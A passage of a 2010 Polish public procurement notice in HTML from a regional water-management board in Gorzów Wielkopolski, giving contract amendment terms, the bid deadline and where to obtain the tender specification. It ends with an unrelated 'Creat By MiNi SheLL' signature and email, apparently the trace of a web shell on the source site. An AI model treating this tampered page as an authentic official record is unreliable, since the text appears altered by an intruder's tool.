        a)  nie uzyskania decyzji administracyjnych, uzgodnień, opinii niezbędnych do zakończenia prac projektowych stanowiących przedmiot umowy, pomimo złożenia kompletnych wniosków do właściwych organów w terminach przewidzianych w odpowiednich przepisach na ich wydanie,
       b) istotnej zmiany przepisów regulujących wykonanie prac projektowych stanowiących przedmiot umowy, 
        c) ustawowej zmiany wysokości podatku VAT
    2)  w przypadku konieczności zmiany przedstawicieli zamawiającego i Wykonawcy.
Wszelkie zmiany postanowień niniejszej umowy (pod rygorem nieważności) wymagają formy pisemnej w formie aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lzmiuw.i.win.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Lubuski Zarząd Melioracji i Urządzeń  Wodnych  w  Zielonej Górze
             Oddział w Gorzowie Wlkp.  66-413 Gorzów Wlkp.  ul. Myśliborska 52.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.09.2010 godzina 10:00, miejsce: Lubuski Zarząd Melioracji i Urządzeń  Wodnych  w  Zielonej Górze
             Oddział w Gorzowie Wlkp.  66-413 Gorzów Wlkp.  ul. Myśliborska 52 
pokój nr 2 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com